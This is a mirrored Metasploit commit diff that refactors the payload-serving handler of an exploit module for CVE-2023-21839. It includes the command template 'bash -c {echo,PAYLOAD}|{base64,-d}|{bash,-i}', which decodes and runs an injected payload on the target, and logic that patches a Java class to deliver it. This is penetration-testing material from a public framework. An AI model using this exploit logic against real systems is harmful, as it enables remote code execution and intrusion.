mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
Slight efficiency improvements
This commit is contained in:
parent
e80987ea59
commit
7ca7c6aee1
Binary file not shown.
@ -1,3 +1,5 @@
|
|||||||
|
import java.util.Base64;
|
||||||
|
|
||||||
public class PayloadRuns {
|
public class PayloadRuns {
|
||||||
static {
|
static {
|
||||||
try {
|
try {
|
||||||
@ -6,4 +8,4 @@ public class PayloadRuns {
|
|||||||
ex.printStackTrace();
|
ex.printStackTrace();
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
@ -375,12 +375,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||||||
def on_request_uri(cli, request)
|
def on_request_uri(cli, request)
|
||||||
agent = request.headers['User-Agent']
|
agent = request.headers['User-Agent']
|
||||||
vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
|
vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
|
||||||
file = File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21839', 'PayloadRuns.class'), 'rb')
|
class_raw = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21839', 'PayloadRuns.class'))
|
||||||
class_raw = file.read
|
|
||||||
file.close
|
|
||||||
base64_payload = Rex::Text.encode_base64(payload.encoded)
|
base64_payload = Rex::Text.encode_base64(payload.encoded)
|
||||||
command_length = (44 - 'PAYLOAD'.length) + base64_payload.length
|
exec_command_length = 'bash -c {echo,PAYLOAD}|{base64,-d}|{bash,-i}'.length
|
||||||
class_raw = class_raw.gsub("\x00\x2C", [command_length].pack('S>'))
|
command_length = (exec_command_length - 'PAYLOAD'.length) + base64_payload.length
|
||||||
|
class_raw = class_raw.gsub("\x00\x2C", [command_length].pack('n'))
|
||||||
class_raw = class_raw.gsub('PAYLOAD', base64_payload)
|
class_raw = class_raw.gsub('PAYLOAD', base64_payload)
|
||||||
send_response(cli, 200, 'OK', class_raw)
|
send_response(cli, 200, 'OK', class_raw)
|
||||||
end
|
end
|
||||||
|
Loading…
Reference in New Issue
Block a user